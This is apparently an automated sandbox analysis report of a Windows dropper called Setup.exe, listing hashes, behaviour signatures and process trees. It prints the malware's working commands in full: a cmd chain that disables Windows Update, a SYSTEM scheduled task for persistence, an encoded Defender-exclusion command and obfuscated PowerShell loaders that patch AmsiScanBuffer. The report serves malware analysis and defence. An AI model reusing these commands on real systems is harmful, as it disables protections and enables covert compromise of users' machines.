Analysis
-
max time kernel
17s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
29-04-2022 11:07
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20220414-en
General
-
Target
Setup.exe
-
Size
3.3MB
-
MD5
89253fded8cd7633cd774b34ec00d7ae
-
SHA1
36579483553c0f703604f439d9b5b46f088ab543
-
SHA256
d4394564000ca31d1d78e78322c3c7bd6287bd0d700b02916cc889ddc2bf22d4
-
SHA512
c79bb7809db89a10d65b268816336f3d952277ec55d65e1e21e6ff2a690c3767fdde08586daa3d4f77ee6d2d85d35aa8d870389ffcf7fb2888de5d16362e616f
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Executes dropped EXE 2 IoCs
Processes:
update.exeiexplore.exepid process 2632 update.exe 1832 iexplore.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1508 takeown.exe 2640 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
iexplore.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation iexplore.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1508 takeown.exe 2640 icacls.exe -
Processes:
iexplore.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 ip-api.com -
Suspicious use of SetThreadContext 2 IoCs
Processes:
update.exeiexplore.exedescription pid process target process PID 2632 set thread context of 1636 2632 update.exe AppLaunch.exe PID 1832 set thread context of 4088 1832 iexplore.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1052 2632 WerFault.exe update.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 34 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Modifies registry key 1 TTPs 8 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3380 reg.exe 3412 reg.exe 2540 reg.exe 3152 reg.exe 1400 reg.exe 2044 reg.exe 3260 reg.exe 4336 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeiexplore.exepowershell.EXEpid process 4016 powershell.exe 4016 powershell.exe 1832 iexplore.exe 3340 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeAppLaunch.exeiexplore.exetakeown.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 4016 powershell.exe Token: SeDebugPrivilege 1636 AppLaunch.exe Token: SeDebugPrivilege 1832 iexplore.exe Token: SeTakeOwnershipPrivilege 1508 takeown.exe Token: SeDebugPrivilege 3340 powershell.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
Setup.exeupdate.exeiexplore.execmd.execmd.execmd.exedescription pid process target process PID 552 wrote to memory of 2632 552 Setup.exe update.exe PID 552 wrote to memory of 2632 552 Setup.exe update.exe PID 552 wrote to memory of 2632 552 Setup.exe update.exe PID 552 wrote to memory of 1832 552 Setup.exe iexplore.exe PID 552 wrote to memory of 1832 552 Setup.exe iexplore.exe PID 2632 wrote to memory of 1636 2632 update.exe AppLaunch.exe PID 2632 wrote to memory of 1636 2632 update.exe AppLaunch.exe PID 2632 wrote to memory of 1636 2632 update.exe AppLaunch.exe PID 2632 wrote to memory of 1636 2632 update.exe AppLaunch.exe PID 2632 wrote to memory of 1636 2632 update.exe AppLaunch.exe PID 1832 wrote to memory of 4536 1832 iexplore.exe cmd.exe PID 1832 wrote to memory of 4536 1832 iexplore.exe cmd.exe PID 4536 wrote to memory of 4016 4536 cmd.exe powershell.exe PID 4536 wrote to memory of 4016 4536 cmd.exe powershell.exe PID 1832 wrote to memory of 4744 1832 iexplore.exe cmd.exe PID 1832 wrote to memory of 4744 1832 iexplore.exe cmd.exe PID 4744 wrote to memory of 1376 4744 cmd.exe sc.exe PID 4744 wrote to memory of 1376 4744 cmd.exe sc.exe PID 4744 wrote to memory of 4784 4744 cmd.exe sc.exe PID 4744 wrote to memory of 4784 4744 cmd.exe sc.exe PID 4744 wrote to memory of 4904 4744 cmd.exe sc.exe PID 4744 wrote to memory of 4904 4744 cmd.exe sc.exe PID 4744 wrote to memory of 2264 4744 cmd.exe sc.exe PID 4744 wrote to memory of 2264 4744 cmd.exe sc.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 1832 wrote to memory of 4088 1832 iexplore.exe conhost.exe PID 4744 wrote to memory of 3500 4744 cmd.exe sc.exe PID 4744 wrote to memory of 3500 4744 cmd.exe sc.exe PID 4744 wrote to memory of 2540 4744 cmd.exe reg.exe PID 4744 wrote to memory of 2540 4744 cmd.exe reg.exe PID 4744 wrote to memory of 3152 4744 cmd.exe reg.exe PID 4744 wrote to memory of 3152 4744 cmd.exe reg.exe PID 4744 wrote to memory of 1400 4744 cmd.exe reg.exe PID 4744 wrote to memory of 1400 4744 cmd.exe reg.exe PID 4744 wrote to memory of 2044 4744 cmd.exe reg.exe PID 4744 wrote to memory of 2044 4744 cmd.exe reg.exe PID 1832 wrote to memory of 2544 1832 iexplore.exe cmd.exe PID 1832 wrote to memory of 2544 1832 iexplore.exe cmd.exe PID 4744 wrote to memory of 3260 4744 cmd.exe reg.exe PID 4744 wrote to memory of 3260 4744 cmd.exe reg.exe PID 4744 wrote to memory of 1508 4744 cmd.exe takeown.exe PID 4744 wrote to memory of 1508 4744 cmd.exe takeown.exe PID 2544 wrote to memory of 4640 2544 cmd.exe schtasks.exe PID 2544 wrote to memory of 4640 2544 cmd.exe schtasks.exe PID 4744 wrote to memory of 2640 4744 cmd.exe icacls.exe PID 4744 wrote to memory of 2640 4744 cmd.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\update.exeC:\Users\Admin\AppData\Local\Temp\update.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 3483⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeC:\Users\Admin\AppData\Local\Temp\iexplore.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGcAaABkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeQBsAHcAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBmAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAHUAaQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Users\Admin\AppData\Roaming\Internet Explorer\UserData\Low\iexplore.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2632 -ip 26321⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rgVLhzRGqmCB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ECMixJQqOVZAYy,[Parameter(Position=1)][Type]$SOUsTYUfhX)$JNSMBFcgWiK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JNSMBFcgWiK.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ECMixJQqOVZAYy).SetImplementationFlags('Runtime,Managed');$JNSMBFcgWiK.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$SOUsTYUfhX,$ECMixJQqOVZAYy).SetImplementationFlags('Runtime,Managed');Write-Output $JNSMBFcgWiK.CreateType();}$WNnRkZkaCFbya=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmFPZuOVUnpnxd=$WNnRkZkaCFbya.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HoblDAfjqupcAyIgVmk=rgVLhzRGqmCB @([String])([IntPtr]);$uQpJaYCpPYcOOgSELwPfXa=rgVLhzRGqmCB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VYajwTVhRRc=$WNnRkZkaCFbya.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$bjeWeVTFwFmPER=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$VYajwTVhRRc,[Object]('Load'+'LibraryA')));$ThmqsWVTNazpYrtwI=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$VYajwTVhRRc,[Object]('Vir'+'tual'+'Pro'+'tect')));$UARpbQm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bjeWeVTFwFmPER,$HoblDAfjqupcAyIgVmk).Invoke('a'+'m'+'si.dll');$ipeeFeutKsHpBztGa=$lmFPZuOVUnpnxd.Invoke($Null,@([Object]$UARpbQm,[Object]('Ams'+'iSc'+'an'+'Buffer')));$sJCLtfKMXt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ThmqsWVTNazpYrtwI,$uQpJaYCpPYcOOgSELwPfXa).Invoke($ipeeFeutKsHpBztGa,[uint32]8,4,[ref]$sJCLtfKMXt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$ipeeFeutKsHpBztGa,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ThmqsWVTNazpYrtwI,$uQpJaYCpPYcOOgSELwPfXa).Invoke($ipeeFeutKsHpBztGa,[uint32]8,0x20,[ref]$sJCLtfKMXt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oAbeXmWcqHzj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PtEfDoPYGAPRqY,[Parameter(Position=1)][Type]$PgCIKxkVGh)$ELVmOlQVBOA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ELVmOlQVBOA.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$PtEfDoPYGAPRqY).SetImplementationFlags('Runtime,Managed');$ELVmOlQVBOA.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$PgCIKxkVGh,$PtEfDoPYGAPRqY).SetImplementationFlags('Runtime,Managed');Write-Output $ELVmOlQVBOA.CreateType();}$TIqaDAIzKvAsB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$bDbtXLuARLhuDi=$TIqaDAIzKvAsB.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KNlolZMthrbtZWpnJHq=oAbeXmWcqHzj @([String])([IntPtr]);$fjDAjQZEVRYAsOlHRjnGmi=oAbeXmWcqHzj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KjcmTfepfPy=$TIqaDAIzKvAsB.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$SlCEpGRzIncMAf=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$KjcmTfepfPy,[Object]('Load'+'LibraryA')));$LSpmQLTuaHEKDWJRW=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$KjcmTfepfPy,[Object]('Vir'+'tual'+'Pro'+'tect')));$sirsngP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SlCEpGRzIncMAf,$KNlolZMthrbtZWpnJHq).Invoke('a'+'m'+'si.dll');$NjJpnnpvCtRsxGcuP=$bDbtXLuARLhuDi.Invoke($Null,@([Object]$sirsngP,[Object]('Ams'+'iSc'+'an'+'Buffer')));$JRrhPiawcD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LSpmQLTuaHEKDWJRW,$fjDAjQZEVRYAsOlHRjnGmi).Invoke($NjJpnnpvCtRsxGcuP,[uint32]8,4,[ref]$JRrhPiawcD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NjJpnnpvCtRsxGcuP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LSpmQLTuaHEKDWJRW,$fjDAjQZEVRYAsOlHRjnGmi).Invoke($NjJpnnpvCtRsxGcuP,[uint32]8,0x20,[ref]$JRrhPiawcD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3005ff32-a7da-499f-b11b-cefd049e4e92}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeFilesize
2.3MB
MD5ed73affd7b0ec16ed1f1207f19ba9d77
SHA11f4f3f70f3c2b2db3c543ae31f243cb18ae85095
SHA2561f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e
SHA5121399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642
-
C:\Users\Admin\AppData\Local\Temp\iexplore.exeFilesize
2.3MB
MD5ed73affd7b0ec16ed1f1207f19ba9d77
SHA11f4f3f70f3c2b2db3c543ae31f243cb18ae85095
SHA2561f684ba70e35713de20fbda7d65a1c792e7d449568c026af5f590074bd852b6e
SHA5121399dc35f33348ff6b7bc44245de6f87827a28dea6d829a1132fd5c0c19c9ac68cef537cce68449473a2943add60adf2413dafe82c422e9a0c20fafebad7e642
-
C:\Users\Admin\AppData\Local\Temp\update.exeFilesize
1.9MB
MD56c08423aa3ca9067cc5583dc28f329fa
SHA120017a7855f2c082c6e6ce3223729123ce604879
SHA256b16c284f45e0dde9a321d5a6ecf0729345839eebc350b5d97073dd10332c551f
SHA512eb399e3d93a84912c26bb7f507c621f54ede53dced5a01fec683103a497c780bd1cb1f4bfc53d458082028c731f19cda826eca0e4d069b8a9225f84ef4e414b0
-
memory/588-194-0x00007FFE34990000-0x00007FFE349A0000-memory.dmpFilesize
64KB
-
memory/668-195-0x00007FFE34990000-0x00007FFE349A0000-memory.dmpFilesize
64KB
-
memory/1376-153-0x0000000000000000-mapping.dmp
-
memory/1400-164-0x0000000000000000-mapping.dmp
-
memory/1508-169-0x0000000000000000-mapping.dmp
-
memory/1636-146-0x0000000005750000-0x00000000057B6000-memory.dmpFilesize
408KB
-
memory/1636-137-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1636-136-0x0000000000000000-mapping.dmp
-
memory/1636-149-0x0000000006830000-0x0000000006DD4000-memory.dmpFilesize
5.6MB
-
memory/1636-150-0x0000000006380000-0x0000000006412000-memory.dmpFilesize
584KB
-
memory/1832-143-0x00007FFE56AC0000-0x00007FFE57581000-memory.dmpFilesize
10.8MB
-
memory/1832-132-0x0000000000000000-mapping.dmp
-
memory/1832-135-0x00000000002F0000-0x000000000053C000-memory.dmpFilesize
2.3MB
-
memory/1832-152-0x000000001D730000-0x000000001D742000-memory.dmpFilesize
72KB
-
memory/1980-184-0x00007FFE74910000-0x00007FFE74B05000-memory.dmpFilesize
2.0MB
-
memory/1980-189-0x00007FFE73EF0000-0x00007FFE73FAE000-memory.dmpFilesize
760KB
-
memory/1980-190-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1980-182-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1980-181-0x00000001400024C8-mapping.dmp
-
memory/1980-180-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/1980-191-0x00007FFE74910000-0x00007FFE74B05000-memory.dmpFilesize
2.0MB
-
memory/1980-183-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/2044-165-0x0000000000000000-mapping.dmp
-
memory/2264-156-0x0000000000000000-mapping.dmp
-
memory/2540-162-0x0000000000000000-mapping.dmp
-
memory/2544-166-0x0000000000000000-mapping.dmp
-
memory/2632-144-0x00000000010E2000-0x00000000010E4000-memory.dmpFilesize
8KB
-
memory/2632-130-0x0000000000000000-mapping.dmp
-
memory/2640-171-0x0000000000000000-mapping.dmp
-
memory/3152-163-0x0000000000000000-mapping.dmp
-
memory/3260-167-0x0000000000000000-mapping.dmp
-
